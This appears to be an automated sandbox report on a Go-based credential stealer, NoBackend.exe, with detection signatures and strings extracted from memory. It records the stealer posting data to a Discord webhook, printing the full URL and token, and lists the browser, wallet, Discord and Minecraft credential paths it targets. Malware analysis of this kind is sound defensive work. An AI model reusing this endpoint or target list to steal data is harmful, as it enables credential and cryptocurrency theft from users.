Edit tour

Windows Analysis Report
NoBackend.exe

Overview

General Information

Sample Name:	NoBackend.exe
Analysis ID:	1340072
MD5:	f6ce63ed5231cba10cdc985e60cf151f
SHA1:	15fc370f4963fe9e35948e6cb315ef77d76b01f5
SHA256:	628c1c8cd9ba30968ba9b8294bd113415f0618aa8b7c7a55307ccb176df9a02e
Tags:	exeexecutablePEstealer
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Drops password protected ZIP file

Found many strings related to Crypto-Wallets (likely being stolen)

Potentially malicious time measurement code found

Tries to harvest and steal browser information (history, passwords, etc)

Found inlined nop instructions (likely shell or obfuscated code)

Queries the volume information (name, serial number etc) of a device

PE file contains sections with non-standard names

Detected potential crypto function

Stores large binary data to the registry

Found potential string decryption / allocating functions

PE file contains more sections than normal

Yara detected Credential Stealer

Contains functionality to call native functions

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

System is w10x64

NoBackend.exe (PID: 5636 cmdline: C:\Users\user\Desktop\NoBackend.exe MD5: F6CE63ED5231CBA10CDC985E60CF151F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: NoBackend.exe PID: 5636	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

HTTP traffic detected: POST /api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344 HTTP/1.1Host: discord.comUser-Agent: Go-http-client/1.1Content-Length: 565Content-Type: application/jsonAccept-Encoding: gzip

Source: unknown

DNS traffic detected: queries for: discord.com

System Summary

Drops password protected ZIP file

Source: LGPKVAOAL.zip.0.dr	Zip Entry: encrypted
Source: LGPKVAOAL.zip.0.dr	Zip Entry: encrypted
Source: LGPKVAOAL.zip.0.dr	Zip Entry: encrypted

Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B78000	0_2_00B78000
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B5C1E0	0_2_00B5C1E0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B77360	0_2_00B77360
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8E500	0_2_00B8E500
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B9BBE0	0_2_00B9BBE0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B94BC0	0_2_00B94BC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B84C20	0_2_00B84C20
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B5CD80	0_2_00B5CD80
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B74EC0	0_2_00B74EC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B88220	0_2_00B88220
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B67200	0_2_00B67200
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B7D3A0	0_2_00B7D3A0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BB4389	0_2_00BB4389
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B813C0	0_2_00B813C0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BBE360	0_2_00BBE360
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BB14C0	0_2_00BB14C0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BCC420	0_2_00BCC420
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BCE440	0_2_00BCE440
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BDB440	0_2_00BDB440
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BDC5E0	0_2_00BDC5E0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC6520	0_2_00BC6520
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B6A500	0_2_00B6A500
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BA66A0	0_2_00BA66A0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B98680	0_2_00B98680
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B706C0	0_2_00B706C0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC5660	0_2_00BC5660
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC8700	0_2_00BC8700
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B6A8A0	0_2_00B6A8A0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B5D880	0_2_00B5D880
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC08C0	0_2_00BC08C0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BA0820	0_2_00BA0820
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BBEAA0	0_2_00BBEAA0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC6A00	0_2_00BC6A00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BEAA00	0_2_00BEAA00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B88A60	0_2_00B88A60
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BE6A5A	0_2_00BE6A5A
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BE2BA0	0_2_00BE2BA0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B7AB00	0_2_00B7AB00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BDAB40	0_2_00BDAB40
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8FCC0	0_2_00B8FCC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B59C00	0_2_00B59C00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BCBC00	0_2_00BCBC00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC8DC0	0_2_00BC8DC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B6DD20	0_2_00B6DD20
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B69EE0	0_2_00B69EE0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B71E40	0_2_00B71E40
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8BE40	0_2_00B8BE40
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B7BF80	0_2_00B7BF80
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B9EF80	0_2_00B9EF80
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B7AFC0	0_2_00B7AFC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BC8FC0	0_2_00BC8FC0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B64F20	0_2_00B64F20
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8EF00	0_2_00B8EF00
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BA9F60	0_2_00BA9F60
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BD6F60	0_2_00BD6F60
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BCDF40	0_2_00BCDF40

Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B875A0 appears 577 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B897C0 appears 580 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B62C20 appears 54 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B9FA20 appears 37 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B88FA0 appears 63 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B9F980 appears 34 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B5AEA0 appears 36 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B9FAE0 appears 40 times
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: String function: 00B87680 appears 32 times

Source: NoBackend.exe

Static PE information: Number of sections : 15 > 10

Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B82080 LoadLibraryExW,RtlAddVectoredContinueHandler,LoadLibraryExW,LoadLibraryExW,NtWaitForSingleObject,RtlGetCurrentPeb,RtlGetNtVersionNumbers,LoadLibraryExW,timeBeginPeriod,timeEndPeriod,LoadLibraryExW,WSAGetOverlappedResult,	0_2_00B82080
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B95060 SetWaitableTimer,NtWaitForSingleObject,	0_2_00B95060
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8B620 SetWaitableTimer,NtWaitForSingleObject,	0_2_00B8B620
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8B7E0 SetWaitableTimer,NtWaitForSingleObject,	0_2_00B8B7E0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8B700 SetWaitableTimer,NtWaitForSingleObject,	0_2_00B8B700
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00B8B8C0 SetWaitableTimer,NtWaitForSingleObject,	0_2_00B8B8C0
Source: C:\Users\user\Desktop\NoBackend.exe	Code function: 0_2_00BB8E20 NtWaitForSingleObject,	0_2_00BB8E20

Source: NoBackend.exe	Static PE information: Section: /19 ZLIB complexity 0.9996098037870472
Source: NoBackend.exe	Static PE information: Section: /32 ZLIB complexity 0.9981072809278351
Source: NoBackend.exe	Static PE information: Section: /65 ZLIB complexity 0.9989415886916186
Source: NoBackend.exe	Static PE information: Section: /78 ZLIB complexity 0.9932583623158756

Source: NoBackend.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NoBackend.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\NoBackend.exe

File opened: C:\Windows\system32\a561d9643f2b5c087a2cd3494651e050beeb6a8fb628bbcf850bca57a2a25a06AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: C:\Users\user\Desktop\NoBackend.exe

File created: C:\Users\user\AppData\Local\Temp\LGPKVAOAL

Jump to behavior

Source: NoBackend.exe	String found in binary or memory: f expNNWindowedx509: invalid RSA public keyx509: invalid DSA public keyx509: invalid DSA parameterscurrent time %s is before %spending ASN.1 child too longinvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encoding/launcher_msa_credent
Source: NoBackend.exe	String found in binary or memory: ion errorx509: invalid ECDSA parametersx509: SAN dNSName is malformedx509: malformed issuerUniqueIDtrailing garbage after addresstransform: short source bufferfmt: unknown base; can't happen/DesktopApps/Minecraft/LauncherW. Central Africa Standard TimeCentral
Source: NoBackend.exe	String found in binary or memory: alformed subjectUniqueIDx509: certificate is valid for crypto/ecdh: invalid public keyzone must be a non-empty string/DesktopApps/Minecraft/Launcher/: day-of-year does not match day/%PROFILE%/Local Storage/leveldbselect url, title from bookmarksselect name, va
Source: NoBackend.exe	String found in binary or memory: odinginvalid P256 compressed point encodinginvalid P384 compressed point encodinginvalid P521 compressed point encodingGODEBUG sys/cpu: unknown cpu feature "/launcher_accounts_microsoft_store.json2006-01-02 15:04:05.999999999 -0700 MST<:hypersquad_events:96870
Source: NoBackend.exe	String found in binary or memory: net/addrselect.go
Source: NoBackend.exe	String found in binary or memory: or parsing regexp: I'm done :yawning_face:<invalid reflect.Value>/.feather/accounts.json/launcher_accounts.json" not found in registryE. Africa Standard TimeTocantins Standard TimeArgentina Standard TimeVenezuela Standard TimeGreenland Standard TimeSri Lanka S
Source: NoBackend.exe	String found in binary or memory: Billing Address ID: \Browser\autofill.txt/Exodus/exodus.walletunsupported operation186264514923095703125931322574615478515625bad type in compare: of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintafter top-level valuein string escape codehttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandled Setting: %vnet/http: nil Contextunknown address type command not supportedPrecondition RequiredInternal Server Errorexec: already startedAnatolian_HieroglyphsInscriptional_Pahlavitrace/breakpoint trapuser defined signal 1user defined signal 2link has been severedpackage not installedblock device requiredstate not recoverableread-only file systemstale NFS file handleReadDirectoryChangesWNetGetJoinInformationnegative shift amountconcurrent map writes/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiondecryption failed: %wsequence tag mismatchAdjustTokenPrivilegesLookupPrivilegeValueWNetUserGetLocalGroupsGetProfilesDirectoryWkey is not comparabledecompression failureunsupported extensionlocalhost.localdomainbufio: negative countinvalid NumericStringx509: invalid versionIPv4 address too longunexpected slice sizeinvalid named captureinvalid scalar length\DesktopApps\MinecraftSao Tome Standard TimeAleutian Standard TimeParaguay Standard TimeMountain Standard TimeAtlantic Standard TimePakistan Standard TimeSakhalin Standard TimeGeorgian Standard TimeCaucasus Standard TimeTasmania Standard TimeDateline Standard TimeHawaiian Standard Time/Local Storage/leveldb\Browser\passwords.txt\Browser\bookmarks.txtPartnered_Server_OwnerVerified_Bot_Developerreflectlite.Value.Type4656612873077392578125unexpected method stepreflect.Value.MapIndexreflect.Value.SetFloat to array with length into Go struct field json: unknown field %qhttp2: frame too largewrite on closed bufferframe_data_pad_too_bigaccess-control-max-ageinvalid Trailer key %qmalformed HTTP versionUnsupported Media TypeDEBUG_HTTP2_GOROUTINESMAX_CONCURRENT_STREAMSInscriptional_ParthianNyiakeng_Puachue_Hmongargument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedConvertSidToStringSidWConvertStringSidToSidWCreateIoCompletionPortGetEnvironmentStringsWGetTimeZoneInformationRtlGetNtVersionNumbersinteger divide by zeroCountPagesInUse (test)ReadMetricsSlow (test)trace reader (blocked)send on closed channelcall not at safe pointgetenv before env initinterface conversion: freeIndex is not validoldoverflow is not nils.freeindex > s.nelemsbad sweepgen in refillspan has no free space/gc/scan/globals:by
Source: NoBackend.exe	String found in binary or memory: runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for [originating from goroutine asn1: string not valid UTF-8bytes: negative Repeat countabi.NewName: name too long: Ed25519 verification failuremalformed MIME header line: cannot unmarshal DNS messageinvalid byte in chunk lengthinvalid proxy address %q: %vbig: misuse of expNNWindowedx509: invalid RSA public keyx509: invalid DSA public keyx509: invalid DSA parameterscurrent time %s is before %spending ASN.1 child too longinvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encoding/launcher_msa_credentials.binTime.UnmarshalBinary: no dataCentral America Standard TimeNorth Asia East Standard TimeN. Central Asia Standard TimeChatham Islands Standard TimeCentral Pacific Standard Time/Google/Chrome Beta/User Data<:partner:968704542021652560>/atomic/Local Storage/leveldb/Guarda/Local Storage/leveldb45474735088646411895751953125reflect: Key of non-map type cannot be converted to type http2: client conn not usablehttp: idle connection timeoutMon, 02 Jan 2006 15:04:05 MSTMon, 02-Jan-2006 15:04:05 MSTinternal error: took too muchframe_pushpromise_zero_streamframe_pushpromise_pad_too_bigaccess-control-expose-headersaccess-control-request-methodhttp2: client connection lostNon-Authoritative InformationProxy Authentication RequiredUnavailable For Legal Reasonsdup idle pconn %p in freelistexec: Wait was already calledoperation already in progressno XENIX semaphores availabletoo many open files in systemmachine is not on the networkprotocol family not supportednumerical result out of rangeDeleteProcThreadAttributeListexecuting on Go runtime stacknotesleep - waitm out of syncneed padding in bucket (elem)/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode= scanobject of a noscan objectruntime: marking free object addspecial on invalid pointerruntime: summary max pages = runtime: levelShift[level] = doRecordGoroutineProfile gp1=timeBegin/EndPeriod not foundruntime: sudog with non-nil cgfput: bad status (not Gdead)LockOSThread nesting overflowsemacquire not on the G stackruntime: split stack overflowstring concatenation too longinvalid function symbol tableinvalid length of trace eventruntime: traceback stuck. pc=runtime: impossible type kindruntime.semasleep wait_failedinteger not minimally-encodedzero length OBJECT IDENTIFIER20060102150405.999999999Z0700pkcs12: odd-length BMP stringpadding contained in alphabetcrypto/aes: invalid key size crypto/des: invalid key size tls: too many ignored recordstls: invalid NextProtos valuetls: invalid server key shareunknown certificate authoritymismatched local address typemime: invalid
Source: NoBackend.exe	String found in binary or memory: (types from different scopes)notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sync/mutex/wait/total:seconds/godebug/non-default-behavior/freedefer with d._panic != nilpanic called with nil argumentcheckdead: inconsistent countsrunqputslow: queue is not fullruntime: bad pointer in frame invalid pointer found on stack locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangeasn1: cannot marshal nil valuemultipart/form-data; boundary=zip: error writing salt or pwvreflect: Len of non-array typeGODEBUG: unknown cpu feature "protocol version not supportedmissing validateFirstLine funcmime: duplicate parameter namesubtle.XORBytes: dst too shortcrypto/rsa: verification errorx509: invalid ECDSA parametersx509: SAN dNSName is malformedx509: malformed issuerUniqueIDtrailing garbage after addresstransform: short source bufferfmt: unknown base; can't happen/DesktopApps/Minecraft/LauncherW. Central Africa Standard TimeCentral Brazilian Standard TimeMountain Standard Time (Mexico)/Google/Chrome Canary/User Data/Yandex/YandexBrowser/User Data/Opera Software/Opera GX Stable11368683772161602973937988281255684341886080801486968994140625reflect: Len of non-array type reflect.MakeSlice: negative lenreflect.MakeSlice: negative capjson: invalid number literal %qin literal true (expecting 'r')in literal true (expecting 'u')in literal true (expecting 'e')in literal null (expecting 'u')in literal null (expecting 'l')expected colon after object keyhttp2: connection error: %v: %vframe_headers_prio_weight_shortPRIORITY frame with stream ID 0too many authentication methodsRequested Range Not SatisfiableRequest Header Fields Too LargeNetwork Authentication Requiredtoo many transfer encodings: %qnet/http: TLS handshake timeoutcannot assign requested address.lib section in a.out corruptedslice bounds out of range [:%x]slice bounds out of range [%x:]call from within the Go runtimeinternal error - misuse of itab) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...
Source: NoBackend.exe	String found in binary or memory: net/addrselect.go

Source: classification engine

Classification label: mal56.spyw.evad.winEXE@1/6@3/2

Source: NoBackend.exe, 00000000.00000002.2073335904.000000C0002F1000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2073335904.000000C0002E5000.00000004.00001000.00020000.00000000.sdmp, Laze1.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NoBackend.exe

Static file information: File size 8311808 > 1048576

Source: NoBackend.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: NoBackend.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x293200
Source: NoBackend.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x292e00

Source: NoBackend.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: NoBackend.exe	Static PE information: section name: .xdata
Source: NoBackend.exe	Static PE information: section name: /4
Source: NoBackend.exe	Static PE information: section name: /19
Source: NoBackend.exe	Static PE information: section name: /32
Source: NoBackend.exe	Static PE information: section name: /46
Source: NoBackend.exe	Static PE information: section name: /65
Source: NoBackend.exe	Static PE information: section name: /78
Source: NoBackend.exe	Static PE information: section name: /90
Source: NoBackend.exe	Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\NoBackend.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\NoBackend.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\NoBackend.exe

Code function: 0_2_00BB70C0 rdtscp

0_2_00BB70C0

Source: C:\Users\user\Desktop\NoBackend.exe

Code function: 0_2_00B82820 GetProcessAffinityMask,GetSystemInfo,

0_2_00B82820

Source: Laze5.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Laze5.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Laze5.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Laze5.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Laze5.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Laze5.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Laze5.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Laze5.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: NoBackend.exe, 00000000.00000002.2077013129.000001B958A1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Laze5.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Laze5.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Laze5.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Laze5.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Laze5.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Laze5.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Laze5.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Laze5.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Laze5.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Laze5.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\NoBackend.exe

Code function: 0_2_00BB70C0 Start: 00BB70C9 End: 00BB70DF

0_2_00BB70C0

Source: C:\Users\user\Desktop\NoBackend.exe

Code function: 0_2_00BB70C0 rdtscp

0_2_00BB70C0

Source: C:\Users\user\Desktop\NoBackend.exe

Code function: 0_2_00B9AC20 AddVectoredExceptionHandler,RtlAddVectoredContinueHandler,RtlAddVectoredContinueHandler,SetUnhandledExceptionFilter,

0_2_00B9AC20

Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\NoBackend.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Found many strings related to Crypto-Wallets (likely being stolen)

Source: NoBackend.exe	String found in binary or memory: achereferrerREDACTEDBytecoinElectrumEthereumFullPath48828125infinitystrconv.parsing ParseIntLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1ContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSArmenianBalineseBopomofoBugineseCherokee
Source: NoBackend.exe	String found in binary or memory: net): MD4MD5RSADSAURITTL: ` Lazerich%s%stypename`%d`text`%s`.ziptrueDataLogsRiotJuneJuly as hourEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDTEdge TronMathCoreEverNamiTEMPuser ...code.log.ldbcordmodecorsfilePOSTLAZEJaxxreadpipeopenlinkStat3125Atoi-Inf
Source: NoBackend.exe	String found in binary or memory: 8KaikasGuardaWombatOxygenSaturnXMR.PTacceptpragmaoriginstore4/ZcashAtomicArmoryExodusremove390625uint16uint32uint64structchan<-<-chan ValueobjectnumberBasic CookiecookieexpectserverclosedExpectstatusPragmasocks Lockedactivesocks5CANCELGOAWAYPADDEDexec: CommonA
Source: NoBackend.exe	String found in binary or memory: achereferrerREDACTEDBytecoinElectrumEthereumFullPath48828125infinitystrconv.parsing ParseIntLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1ContinueAcceptedConflicthijackedNO_ERRORPRIORITYSETTINGSArmenianBalineseBopomofoBugineseCherokee
Source: NoBackend.exe	String found in binary or memory: imeArab Standard TimeIran Standard TimeRussia Time Zone 3Fiji Standard Time/Vivaldi/User Data/%PROFILE%/Network Expiration Year: Bug_Hunter_Level_1Bug_Hunter_Level_2request failed: %v/Ethereum/keystoreGetExitCodeProcessvalue out of range298023223876953125refle

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
